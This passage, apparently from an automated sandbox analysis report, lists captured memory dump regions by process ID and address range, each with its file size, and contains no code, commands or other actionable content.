                      • memory/4324-776-0x0000027910F00000-0x0000027910F10000-memory.dmp

                        Filesize

                        64KB

                      • memory/4324-809-0x0000027929580000-0x000002792958A000-memory.dmp

                        Filesize

                        40KB

                      • memory/4524-697-0x000002653EF20000-0x000002653EF30000-memory.dmp

                        Filesize

                        64KB

                      • memory/4524-696-0x000002653EF20000-0x000002653EF30000-memory.dmp

                        Filesize

                        64KB

                      • memory/4524-695-0x000002653EF20000-0x000002653EF30000-memory.dmp

                        Filesize

                        64KB

                      • memory/4596-913-0x000001D4DB970000-0x000001D4DB980000-memory.dmp

                        Filesize

                        64KB

                      • memory/4596-1155-0x000001D4DB970000-0x000001D4DB980000-memory.dmp

                        Filesize

                        64KB

                      • memory/4596-1207-0x000001D4DB970000-0x000001D4DB980000-memory.dmp

                        Filesize

                        64KB

                      • memory/4596-1201-0x000001D4DB970000-0x000001D4DB980000-memory.dmp

                        Filesize

                        64KB

                      • memory/4596-1161-0x000001D4DB970000-0x000001D4DB980000-memory.dmp

                        Filesize

                        64KB

                      • memory/4596-1156-0x00007FF7E94C0000-0x00007FF7E94D0000-memory.dmp

                        Filesize

                        64KB

                      • memory/4596-915-0x000001D4DB970000-0x000001D4DB980000-memory.dmp

                        Filesize

                        64KB

                      • memory/4596-960-0x00007FF7E94C0000-0x00007FF7E94D0000-memory.dmp

                        Filesize

                        64KB

                      • memory/4596-1019-0x000001D4DB970000-0x000001D4DB980000-memory.dmp

                        Filesize

                        64KB

                      • memory/4596-1145-0x000001D4DBB40000-0x000001D4DBB5C000-memory.dmp

                        Filesize

                        112KB

                      • memory/4596-1154-0x000001D4DB970000-0x000001D4DB980000-memory.dmp

                        Filesize

                        64KB

                      • memory/4972-597-0x00007FF6CB520000-0x00007FF6CC4C0000-memory.dmp

                        Filesize

                        15.6MB

                      • memory/4972-596-0x00007FF6CB520000-0x00007FF6CC4C0000-memory.dmp

                        Filesize

                        15.6MB

                      • memory/4972-666-0x00007FF6CB520000-0x00007FF6CC4C0000-memory.dmp

                        Filesize

                        15.6MB

                      • memory/4972-599-0x00007FF6CB520000-0x00007FF6CC4C0000-memory.dmp

                        Filesize

                        15.6MB

                      • memory/4972-594-0x00007FF6CB520000-0x00007FF6CC4C0000-memory.dmp

                        Filesize

                        15.6MB

                      • memory/4972-595-0x00007FF6CB520000-0x00007FF6CC4C0000-memory.dmp

                        Filesize

                        15.6MB

                      • memory/4972-598-0x00007FF6CB520000-0x00007FF6CC4C0000-memory.dmp

                        Filesize

                        15.6MB

                      • memory/4972-602-0x00007FF6CB520000-0x00007FF6CC4C0000-memory.dmp

                        Filesize

                        15.6MB

                      • memory/4972-712-0x00007FF6CB520000-0x00007FF6CC4C0000-memory.dmp

                        Filesize

                        15.6MB

                      • memory/4972-723-0x00007FF6CB520000-0x00007FF6CC4C0000-memory.dmp

                        Filesize

                        15.6MB

                      • memory/4972-600-0x00007FF6CB520000-0x00007FF6CC4C0000-memory.dmp

                        Filesize

                        15.6MB